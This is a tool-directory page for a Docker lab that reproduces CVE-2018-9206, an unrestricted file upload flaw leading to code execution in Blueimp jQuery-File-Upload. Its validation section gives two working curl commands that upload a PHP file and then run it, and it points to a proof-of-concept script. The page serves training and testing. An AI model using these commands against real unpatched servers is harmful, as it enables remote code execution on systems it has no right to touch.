Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-9206-jquery-file-upload | Kitploit
Tools/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
17 months agoNot yet reviewed

CVE-2018-9206 - Blueimp jQuery-File-Upload Lab

Vulnerable Docker environment for CVE-2018-9206 - Unrestricted File Upload in Blueimp jQuery-File-Upload <= 9.22.0.

Quickstart

root@kitploit:~
docker compose up -d --build

App available at: http://localhost:8888/jQuery-File-Upload/

Validate

root@kitploit:~
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

Or run the PoC script:

root@kitploit:~
./scripts/poc.sh

Cleanup

root@kitploit:~
docker compose down -v

Details

FieldValue
CVECVE-2018-9206
ProductBlueimp jQuery-File-Upload
Version9.22.0
TypeUnrestricted File Upload → RCE

References

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
Download Tool
CVSS9.8 (Critical)